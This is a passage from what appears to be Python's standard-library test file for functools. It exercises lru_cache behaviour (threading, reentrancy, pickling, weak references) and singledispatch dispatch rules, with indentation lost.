@self.module.lru_cache(maxsize=10)
def f(**kwargs):
return list(kwargs.items())
self.assertEqual(f(a=1, b=2), [('a', 1), ('b', 2)])
self.assertEqual(f(b=2, a=1), [('b', 2), ('a', 1)])
self.assertEqual(f.cache_info(),
self.module._CacheInfo(hits=0, misses=2, maxsize=10, currsize=2))
def test_lru_cache_decoration(self):
def f(zomg: 'zomg_annotation'):
"""f doc string"""
return 42
g = self.module.lru_cache()(f)
for attr in self.module.WRAPPER_ASSIGNMENTS:
self.assertEqual(getattr(g, attr), getattr(f, attr))
def test_lru_cache_threaded(self):
n, m = 5, 11
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=n*m)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(currsize, 0)
start = threading.Event()
def full(k):
start.wait(10)
for _ in range(m):
self.assertEqual(f(k, 0), orig(k, 0))
def clear():
start.wait(10)
for _ in range(2*m):
f.cache_clear()
orig_si = sys.getswitchinterval()
support.setswitchinterval(1e-6)
try:
# create n threads in order to fill cache
threads = [threading.Thread(target=full, args=[k])
for k in range(n)]
with threading_helper.start_threads(threads):
start.set()
hits, misses, maxsize, currsize = f.cache_info()
if self.module is py_functools:
# XXX: Why can be not equal?
self.assertLessEqual(misses, n)
self.assertLessEqual(hits, m*n - misses)
else:
self.assertEqual(misses, n)
self.assertEqual(hits, m*n - misses)
self.assertEqual(currsize, n)
# create n threads in order to fill cache and 1 to clear it
threads = [threading.Thread(target=clear)]
threads += [threading.Thread(target=full, args=[k])
for k in range(n)]
start.clear()
with threading_helper.start_threads(threads):
start.set()
finally:
sys.setswitchinterval(orig_si)
def test_lru_cache_threaded2(self):
# Simultaneous call with the same arguments
n, m = 5, 7
start = threading.Barrier(n+1)
pause = threading.Barrier(n+1)
stop = threading.Barrier(n+1)
@self.module.lru_cache(maxsize=m*n)
def f(x):
pause.wait(10)
return 3 * x
self.assertEqual(f.cache_info(), (0, 0, m*n, 0))
def test():
for i in range(m):
start.wait(10)
self.assertEqual(f(i), 3 * i)
stop.wait(10)
threads = [threading.Thread(target=test) for k in range(n)]
with threading_helper.start_threads(threads):
for i in range(m):
start.wait(10)
stop.reset()
pause.wait(10)
start.reset()
stop.wait(10)
pause.reset()
self.assertEqual(f.cache_info(), (0, (i+1)*n, m*n, i+1))
def test_lru_cache_threaded3(self):
@self.module.lru_cache(maxsize=2)
def f(x):
time.sleep(.01)
return 3 * x
def test(i, x):
with self.subTest(thread=i):
self.assertEqual(f(x), 3 * x, i)
threads = [threading.Thread(target=test, args=(i, v))
for i, v in enumerate([1, 2, 2, 3, 2])]
with threading_helper.start_threads(threads):
pass
def test_need_for_rlock(self):
# This will deadlock on an LRU cache that uses a regular lock
@self.module.lru_cache(maxsize=10)
def test_func(x):
'Used to demonstrate a reentrant lru_cache call within a single thread'
return x
class DoubleEq:
'Demonstrate a reentrant lru_cache call within a single thread'
def __init__(self, x):
self.x = x
def __hash__(self):
return self.x
def __eq__(self, other):
if self.x == 2:
test_func(DoubleEq(1))
return self.x == other.x
test_func(DoubleEq(1)) # Load the cache
test_func(DoubleEq(2)) # Load the cache
self.assertEqual(test_func(DoubleEq(2)), # Trigger a re-entrant __eq__ call
DoubleEq(2)) # Verify the correct return value
def test_lru_method(self):
class X(int):
f_cnt = 0
@self.module.lru_cache(2)
def f(self, x):
self.f_cnt += 1
return x*10+self
a = X(5)
b = X(5)
c = X(7)
self.assertEqual(X.f.cache_info(), (0, 0, 2, 0))
for x in 1, 2, 2, 3, 1, 1, 1, 2, 3, 3:
self.assertEqual(a.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 0, 0))
self.assertEqual(X.f.cache_info(), (4, 6, 2, 2))
for x in 1, 2, 1, 1, 1, 1, 3, 2, 2, 2:
self.assertEqual(b.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 0))
self.assertEqual(X.f.cache_info(), (10, 10, 2, 2))
for x in 2, 1, 1, 1, 1, 2, 1, 3, 2, 1:
self.assertEqual(c.f(x), x*10 + 7)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 5))
self.assertEqual(X.f.cache_info(), (15, 15, 2, 2))
self.assertEqual(a.f.cache_info(), X.f.cache_info())
self.assertEqual(b.f.cache_info(), X.f.cache_info())
self.assertEqual(c.f.cache_info(), X.f.cache_info())
def test_pickle(self):
cls = self.__class__
for f in cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto, func=f):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertIs(f_copy, f)
def test_copy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.copy(f)
self.assertIs(f_copy, f)
def test_deepcopy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.deepcopy(f)
self.assertIs(f_copy, f)
def test_lru_cache_parameters(self):
@self.module.lru_cache(maxsize=2)
def f():
return 1
self.assertEqual(f.cache_parameters(), {'maxsize': 2, "typed": False})
@self.module.lru_cache(maxsize=1000, typed=True)
def f():
return 1
self.assertEqual(f.cache_parameters(), {'maxsize': 1000, "typed": True})
def test_lru_cache_weakrefable(self):
@self.module.lru_cache
def test_function(x):
return x
class A:
@self.module.lru_cache
def test_method(self, x):
return (self, x)
@staticmethod
@self.module.lru_cache
def test_staticmethod(x):
return (self, x)
refs = [weakref.ref(test_function),
weakref.ref(A.test_method),
weakref.ref(A.test_staticmethod)]
for ref in refs:
self.assertIsNotNone(ref())
del A
del test_function
gc.collect()
for ref in refs:
self.assertIsNone(ref())
@py_functools.lru_cache()
def py_cached_func(x, y):
return 3 * x + y
@c_functools.lru_cache()
def c_cached_func(x, y):
return 3 * x + y
class TestLRUPy(TestLRU, unittest.TestCase):
module = py_functools
cached_func = py_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestLRUC(TestLRU, unittest.TestCase):
module = c_functools
cached_func = c_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestSingleDispatch(unittest.TestCase):
def test_simple_overloads(self):
@functools.singledispatch
def g(obj):
return "base"
def g_int(i):
return "integer"
g.register(int, g_int)
self.assertEqual(g("str"), "base")
self.assertEqual(g(1), "integer")
self.assertEqual(g([1,2,3]), "base")
def test_mro(self):
@functools.singledispatch
def g(obj):
return "base"
class A:
pass
class C(A):
pass
class B(A):
pass
class D(C, B):
pass
def g_A(a):
return "A"
def g_B(b):
return "B"
g.register(A, g_A)
g.register(B, g_B)
self.assertEqual(g(A()), "A")
self.assertEqual(g(B()), "B")
self.assertEqual(g(C()), "A")
self.assertEqual(g(D()), "B")
def test_register_decorator(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(int)
def g_int(i):
return "int %s" % (i,)
self.assertEqual(g(""), "base")
self.assertEqual(g(12), "int 12")
self.assertIs(g.dispatch(int), g_int)
self.assertIs(g.dispatch(object), g.dispatch(str))
# Note: in the assert above this is not g.
# @singledispatch returns the wrapper.
def test_wrapping_attributes(self):
@functools.singledispatch
def g(obj):
"Simple test"
return "Test"
self.assertEqual(g.__name__, "g")
if sys.flags.optimize < 2:
self.assertEqual(g.__doc__, "Simple test")
@unittest.skipUnless(decimal, 'requires _decimal')
@support.cpython_only
def test_c_classes(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(decimal.DecimalException)
def _(obj):
return obj.args
subn = decimal.Subnormal("Exponent < Emin")
rnd = decimal.Rounded("Number got rounded")
self.assertEqual(g(subn), ("Exponent < Emin",))
self.assertEqual(g(rnd), ("Number got rounded",))
@g.register(decimal.Subnormal)
def _(obj):
return "Too small to care."
self.assertEqual(g(subn), "Too small to care.")
self.assertEqual(g(rnd), ("Number got rounded",))
def test_compose_mro(self):
# None of the examples in this test depend on haystack ordering.
c = collections.abc
mro = functools._compose_mro
bases = [c.Sequence, c.MutableMapping, c.Mapping, c.Set]
for haystack in permutations(bases):
m = mro(dict, haystack)
self.assertEqual(m, [dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
bases = [c.Container, c.Mapping, c.MutableMapping, collections.OrderedDict]
for haystack in permutations(bases):
m = mro(collections.ChainMap, haystack)
self.assertEqual(m, [collections.ChainMap, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
# If there's a generic function with implementations registered for
# both Sized and Container, passing a defaultdict to it results in an
# ambiguous dispatch which will cause a RuntimeError (see
# test_mro_conflicts).
bases = [c.Container, c.Sized, str]
for haystack in permutations(bases):
m = mro(collections.defaultdict, [c.Sized, c.Container, str])
self.assertEqual(m, [collections.defaultdict, dict, c.Sized,
c.Container, object])
# MutableSequence below is registered directly on D. In other words, it
# precedes MutableMapping which means single dispatch will always
# choose MutableSequence here.
class D(collections.defaultdict):
pass
c.MutableSequence.register(D)
bases = [c.MutableSequence, c.MutableMapping]
for haystack in permutations(bases):
m = mro(D, bases)
self.assertEqual(m, [D, c.MutableSequence, c.Sequence, c.Reversible,
collections.defaultdict, dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable, c.Container,
object])
# Container and Callable are registered on different base classes and
# a generic function supporting both should always pick the Callable
# implementation if a C instance is passed.
class C(collections.defaultdict):
def __call__(self):
pass
bases = [c.Sized, c.Callable, c.Container, c.Mapping]
for haystack in permutations(bases):
m = mro(C, haystack)
self.assertEqual(m, [C, c.Callable, collections.defaultdict, dict, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
def test_register_abc(self):
c = collections.abc
d = {"a": "b"}
l = [1, 2, 3]
s = {object(), None}
f = frozenset(s)
t = (1, 2, 3)
@functools.singledispatch
def g(obj):
return "base"
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "base")
self.assertEqual(g(s), "base")
self.assertEqual(g(f), "base")
self.assertEqual(g(t), "base")
g.register(c.Sized, lambda obj: "sized")
self.assertEqual(g(d), "sized")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableMapping, lambda obj: "mutablemapping")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(collections.ChainMap, lambda obj: "chainmap")
self.assertEqual(g(d), "mutablemapping") # irrelevant ABCs registered
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSequence, lambda obj: "mutablesequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSet, lambda obj: "mutableset")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Mapping, lambda obj: "mapping")
self.assertEqual(g(d), "mutablemapping") # not specific enough
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Sequence, lambda obj: "sequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sequence")
g.register(c.Set, lambda obj: "set")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(dict, lambda obj: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(list, lambda obj: "list")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(set, lambda obj: "concrete-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(frozenset, lambda obj: "frozen-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "sequence")
g.register(tuple, lambda obj: "tuple")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "tuple")
def test_c3_abc(self):
c = collections.abc
mro = functools._c3_mro
class A(object):
pass
class B(A):
def __len__(self):
return 0 # implies Sized
@c.Container.register
class C(object):
pass
class D(object):
pass # unrelated
class X(D, C, B):
def __call__(self):
pass # implies Callable
expected = [X, c.Callable, D, C, c.Container, B, c.Sized, A, object]
for abcs in permutations([c.Sized, c.Callable, c.Container]):
self.assertEqual(mro(X, abcs=abcs), expected)
# unrelated ABCs don't appear in the resulting MRO
many_abcs = [c.Mapping, c.Sized, c.Callable, c.Container, c.Iterable]
self.assertEqual(mro(X, abcs=many_abcs), expected)
def test_false_meta(self):
# see issue23572
class MetaA(type):
def __len__(self):
return 0
class A(metaclass=MetaA):
pass
class AA(A):
pass
@functools.singledispatch
def fun(a):
return 'base A'
@fun.register(A)
def _(a):
return 'fun A'
aa = AA()
self.assertEqual(fun(aa), 'fun A')
def test_mro_conflicts(self):
c = collections.abc
@functools.singledispatch
def g(arg):
return "base"
class O(c.Sized):
def __len__(self):
return 0
o = O()
self.assertEqual(g(o), "base")
g.register(c.Iterable, lambda arg: "iterable")
g.register(c.Container, lambda arg: "container")
g.register(c.Sized, lambda arg: "sized")
g.register(c.Set, lambda arg: "set")
self.assertEqual(g(o), "sized")
c.Iterable.register(O)
self.assertEqual(g(o), "sized") # because it's explicitly in __mro__
c.Container.register(O)
self.assertEqual(g(o), "sized") # see above: Sized is in __mro__
c.Set.register(O)
self.assertEqual(g(o), "set") # because c.Set is a subclass of
# c.Sized and c.Container
class P:
pass
p = P()
self.assertEqual(g(p), "base")
c.Iterable.register(P)
self.assertEqual(g(p), "iterable")
c.Container.register(P)
with self.assertRaises(RuntimeError) as re_one:
g(p)
self.assertIn(
str(re_one.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Iterable'>"),
("Ambiguous dispatch: <class 'collections.abc.Iterable'> "
"or <class 'collections.abc.Container'>")),
)
class Q(c.Sized):
def __len__(self):
return 0
q = Q()
self.assertEqual(g(q), "sized")
c.Iterable.register(Q)
self.assertEqual(g(q), "sized") # because it's explicitly in __mro__
c.Set.register(Q)
self.assertEqual(g(q), "set") # because c.Set is a subclass of
# c.Sized and c.Iterable
@functools.singledispatch
def h(arg):
return "base"
@h.register(c.Sized)
def _(arg):
return "sized"
@h.register(c.Container)
def _(arg):
return "container"
# Even though Sized and Container are explicit bases of MutableMapping,
# this ABC is implicitly registered on defaultdict which makes all of
# MutableMapping's bases implicit as well from defaultdict's
# perspective.
with self.assertRaises(RuntimeError) as re_two:
h(collections.defaultdict(lambda: 0))
self.assertIn(
str(re_two.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class R(collections.defaultdict):
pass
c.MutableSequence.register(R)
@functools.singledispatch
def i(arg):
return "base"
@i.register(c.MutableMapping)
def _(arg):
return "mapping"
@i.register(c.MutableSequence)
def _(arg):
return "sequence"
r = R()
self.assertEqual(i(r), "sequence")
class S:
pass
class T(S, c.Sized):
def __len__(self):
return 0
t = T()
self.assertEqual(h(t), "sized")
c.Container.register(T)
self.assertEqual(h(t), "sized") # because it's explicitly in the MRO
class U:
def __len__(self):
return 0
u = U()
self.assertEqual(h(u), "sized") # implicit Sized subclass inferred
# from the existence of __len__()
c.Container.register(U)
# There is no preference for registered versus inferred ABCs.
with self.assertRaises(RuntimeError) as re_three:
h(u)
self.assertIn(
str(re_three.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class V(c.Sized, S):
def __len__(self):
return 0
@functools.singledispatch
def j(arg):
return "base"
@j.register(S)
def _(arg):
return "s"
@j.register(c.Container)
def _(arg):
return "container"
v = V()
self.assertEqual(j(v), "s")
c.Container.register(V)
self.assertEqual(j(v), "container") # because it ends up right after
# Sized in the MRO
def test_cache_invalidation(self):
from collections import UserDict
import weakref
class TracingDict(UserDict):
def __init__(self, *args, **kwargs):
super(TracingDict, self).__init__(*args, **kwargs)
self.set_ops = []
self.get_ops = []
def __getitem__(self, key):
result = self.data[key]
self.get_ops.append(key)
return result
def __setitem__(self, key, value):
self.set_ops.append(key)
self.data[key] = value
def clear(self):
self.data.clear()
td = TracingDict()
with support.swap_attr(weakref, "WeakKeyDictionary", lambda: td):
c = collections.abc
@functools.singledispatch
def g(arg):
return "base"
d = {}
l = []
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(g(l), "base")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict, list])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(td.data[list], g.registry[object])
self.assertEqual(td.data[dict], td.data[list])
self.assertEqual(g(l), "base")
self.assertEqual(g(d), "base")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list])
g.register(list, lambda arg: "list")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict])
self.assertEqual(td.data[dict],
functools._find_impl(dict, g.registry))
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list])
self.assertEqual(td.data[list],
functools._find_impl(list, g.registry))
class X:
pass
c.MutableMapping.register(X) # Will not invalidate the cache,
# not using ABCs yet.
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "list")
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list])
g.register(c.Sized, lambda arg: "sized")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "sized")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict])
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
self.assertEqual(g(l), "list")
self.assertEqual(g(d), "sized")
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
g.dispatch(list)
g.dispatch(dict)
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict,
list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
c.MutableSet.register(X) # Will invalidate the cache.
self.assertEqual(len(td), 2) # Stale cache.
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 1)
g.register(c.MutableMapping, lambda arg: "mutablemapping")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(len(td), 1)
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
g.register(dict, lambda arg: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
g._clear_cache()
self.assertEqual(len(td), 0)
def test_annotations(self):
@functools.singledispatch
def i(arg):
return "base"
@i.register
def _(arg: collections.abc.Mapping):
return "mapping"
@i.register
def _(arg: "collections.abc.Sequence"):
return "sequence"
self.assertEqual(i(None), "base")
self.assertEqual(i({"a": 1}), "mapping")
self.assertEqual(i([1, 2, 3]), "sequence")
self.assertEqual(i((1, 2, 3)), "sequence")
self.assertEqual(i("str"), "sequence")
# Registering classes as callables doesn't work with annotations,
# you need to pass the type explicitly.
@i.register(str)
class _:
def __init__(self, arg):
self.arg = arg
def __eq__(self, other):
return self.arg == other
self.assertEqual(i("str"), "str")
def test_method_register(self):
class A:
@functools.singledispatchmethod
def t(self, arg):
self.arg = "base"
@t.register(int)
def _(self, arg):
self.arg = "int"
@t.register(str)
def _(self, arg):
self.arg = "str"
a = A()
a.t(0)
self.assertEqual(a.arg, "int")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
a.t('')
self.assertEqual(a.arg, "str")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
a.t(0.0)
self.assertEqual(a.arg, "base")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
def test_staticmethod_register(self):
class A:
@functools.singledispatchmethod
@staticmethod
def t(arg):
return arg
@t.register(int)
@staticmethod
def _(arg):
return isinstance(arg, int)
@t.register(str)
@staticmethod
def _(arg):
return isinstance(arg, str)
a = A()
self.assertTrue(A.t(0))
self.assertTrue(A.t(''))
self.assertEqual(A.t(0.0), 0.0)
def test_classmethod_register(self):
class A:
def __init__(self, arg):
self.arg = arg
@functools.singledispatchmethod
@classmethod
def t(cls, arg):
return cls("base")
@t.register(int)
@classmethod
def _(cls, arg):
return cls("int")
@t.register(str)
@classmethod
def _(cls, arg):
return cls("str")
self.assertEqual(A.t(0).arg, "int")
self.assertEqual(A.t('').arg, "str")
self.assertEqual(A.t(0.0).arg, "base")
def test_callable_register(self):
class A:
def __init__(self, arg):
self.arg = arg
@functools.singledispatchmethod
@classmethod
def t(cls, arg):
return cls("base")
@A.t.register(int)
@classmethod
def _(cls, arg):
return cls("int")
@A.t.register(str)
@classmethod
def _(cls, arg):
return cls("str")
self.assertEqual(A.t(0).arg, "int")
self.assertEqual(A.t('').arg, "str")
self.assertEqual(A.t(0.0).arg, "base")
def test_abstractmethod_register(self):
class Abstract(metaclass=abc.ABCMeta):
@functools.singledispatchmethod
@abc.abstractmethod
def add(self, x, y):
pass
self.assertTrue(Abstract.add.__isabstractmethod__)
self.assertTrue(Abstract.__dict__['add'].__isabstractmethod__)
with self.assertRaises(TypeError):
Abstract()
def test_type_ann_register(self):
class A:
@functools.singledispatchmethod
def t(self, arg):
return "base"
@t.register
def _(self, arg: int):
return "int"
@t.register
def _(self, arg: str):
return "str"
a = A()
self.assertEqual(a.t(0), "int")
self.assertEqual(a.t(''), "str")
self.assertEqual(a.t(0.0), "base")
def test_staticmethod_type_ann_register(self):
class A:
@functools.singledispatchmethod
@staticmethod
def t(arg):
return arg
@t.register
@staticmethod
def _(arg: int):
return isinstance(arg, int)
@t.register
@staticmethod
def _(arg: str):
return isinstance(arg, str)
a = A()
self.assertTrue(A.t(0))
self.assertTrue(A.t(''))
self.assertEqual(A.t(0.0), 0.0)
def test_classmethod_type_ann_register(self):
class A:
def __init__(self, arg):
self.arg = arg
@functools.singledispatchmethod
@classmethod
def t(cls, arg):
return cls("base")
@t.register
@classmethod
def _(cls, arg: int):
return cls("int")
@t.register
@classmethod
def _(cls, arg: str):
return cls("str")
self.assertEqual(A.t(0).arg, "int")
self.assertEqual(A.t('').arg, "str")
self.assertEqual(A.t(0.0).arg, "base")
def test_method_wrapping_attributes(self):
class A:
@functools.singledispatchmethod
def func(self, arg: int) -> str:
"""My function docstring"""
return str(arg)
@functools.singledispatchmethod
@classmethod
def cls_func(cls, arg: int) -> str:
"""My function docstring"""
return str(arg)
@functools.singledispatchmethod
@staticmethod
def static_func(arg: int) -> str:
"""My function docstring"""
return str(arg)
for meth in (
A.func,
A().func,
A.cls_func,
A().cls_func,
A.static_func,
A().static_func
):
with self.subTest(meth=meth):
self.assertEqual(meth.__doc__, 'My function docstring')
self.assertEqual(meth.__annotations__['arg'], int)
self.assertEqual(A.func.__name__, 'func')
self.assertEqual(A().func.__name__, 'func')
self.assertEqual(A.cls_func.__name__, 'cls_func')
self.assertEqual(A().cls_func.__name__, 'cls_func')
self.assertEqual(A.static_func.__name__, 'static_func')
self.assertEqual(A().static_func.__name__, 'static_func')
def test_double_wrapped_methods(self):
def classmethod_friendly_decorator(func):
wrapped = func.__func__
@classmethod
@functools.wraps(wrapped)
def wrapper(*args, **kwargs):
return wrapped(*args, **kwargs)
return wrapper
class WithoutSingleDispatch:
@classmethod
@contextlib.contextmanager
def cls_context_manager(cls, arg: int) -> str:
try:
yield str(arg)
finally:
return 'Done'
@classmethod_friendly_decorator
@classmethod
def decorated_classmethod(cls, arg: int) -> str:
return str(arg)
class WithSingleDispatch:
@functools.singledispatchmethod
@classmethod
@contextlib.contextmanager
def cls_context_manager(cls, arg: int) -> str:
"""My function docstring"""
try:
yield str(arg)
finally:
return 'Done'
@functools.singledispatchmethod
@classmethod_friendly_decorator
@classmethod
def decorated_classmethod(cls, arg: int) -> str:
"""My function docstring"""
return str(arg)
# These are sanity checks
# to test the test itself is working as expected
with WithoutSingleDispatch.cls_context_manager(5) as foo:
without_single_dispatch_foo = foo
with WithSingleDispatch.cls_context_manager(5) as foo:
single_dispatch_foo = foo
self.assertEqual(without_single_dispatch_foo, single_dispatch_foo)
self.assertEqual(single_dispatch_foo, '5')
self.assertEqual(
WithoutSingleDispatch.decorated_classmethod(5),
WithSingleDispatch.decorated_classmethod(5)
)
self.assertEqual(WithSingleDispatch.decorated_classmethod(5), '5')
# Behavioural checks now follow
for method_name in ('cls_context_manager', 'decorated_classmethod'):
with self.subTest(method=method_name):
self.assertEqual(
getattr(WithSingleDispatch, method_name).__name__,
getattr(WithoutSingleDispatch, method_name).__name__
)
self.assertEqual(
getattr(WithSingleDispatch(), method_name).__name__,
getattr(WithoutSingleDispatch(), method_name).__name__
)
for meth in (
WithSingleDispatch.cls_context_manager,
WithSingleDispatch().cls_context_manager,
WithSingleDispatch.decorated_classmethod,
WithSingleDispatch().decorated_classmethod
):
with self.subTest(meth=meth):
self.assertEqual(meth.__doc__, 'My function docstring')
self.assertEqual(meth.__annotations__['arg'], int)
self.assertEqual(
WithSingleDispatch.cls_context_manager.__name__,
'cls_context_manager'
)
self.assertEqual(
WithSingleDispatch().cls_context_manager.__name__,
'cls_context_manager'
)
self.assertEqual(
WithSingleDispatch.decorated_classmethod.__name__,
'decorated_classmethod'
)
self.assertEqual(
WithSingleDispatch().decorated_classmethod.__name__,
'decorated_classmethod'
)
def test_invalid_registrations(self):
msg_prefix = "Invalid first argument to `register()`: "
msg_suffix = (
". Use either `@register(some_class)` or plain `@register` on an "
"annotated function."
)
@functools.singledispatch
def i(arg):
return "base"
with self.assertRaises(TypeError) as exc:
@i.register(42)
def _(arg):
return "I annotated with a non-type"
self.assertTrue(str(exc.exception).startswith(msg_prefix + "42"))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg):
return "I forgot to annotate"
self.assertTrue(str(exc.exception).startswith(msg_prefix +
"<function TestSingleDispatch.test_invalid_registrations.<locals>._"
))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg: typing.Iterable[str]):
# At runtime, dispatching on generics is impossible.
# When registering implementations with singledispatch, avoid
# types from `typing`. Instead, annotate with regular types
# or ABCs.
return "I annotated with a generic collection"
self.assertTrue(str(exc.exception).startswith(
"Invalid annotation for 'arg'."
))
self.assertTrue(str(exc.exception).endswith(
'typing.Iterable[str] is not a class.'
))
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg: typing.Union[int, typing.Iterable[str]]):
return "Invalid Union"
self.assertTrue(str(exc.exception).startswith(
"Invalid annotation for 'arg'."
))
self.assertTrue(str(exc.exception).endswith(
'typing.Union[int, typing.Iterable[str]] not all arguments are classes.'
))
def test_invalid_positional_argument(self):
@functools.singledispatch
def f(*args):
pass
msg = 'f requires at least 1 positional argument'
with self.assertRaisesRegex(TypeError, msg):
f()
def test_union(self):
@functools.singledispatch
def f(arg):
return "default"
@f.register
def _(arg: typing.Union[str, bytes]):
return "typing.Union"
@f.register
def _(arg: int | float):
return "types.UnionType"
self.assertEqual(f([]), "default")
self.assertEqual(f(""), "typing.Union")
self.assertEqual(f(b""), "typing.Union")
self.assertEqual(f(1), "types.UnionType")
self.assertEqual(f(1.0), "types.UnionType")
def test_register_genericalias(self):
@functools.singledispatch
def f(arg):
return "default"
with self.assertRaisesRegex(TypeError, "Invalid first argument to "):
f.register(list[int], lambda arg: "types.GenericAlias")
with self.assertRaisesRegex(TypeError, "Invalid first argument to "):
f.register(typing.List[int], lambda arg: "typing.GenericAlias")
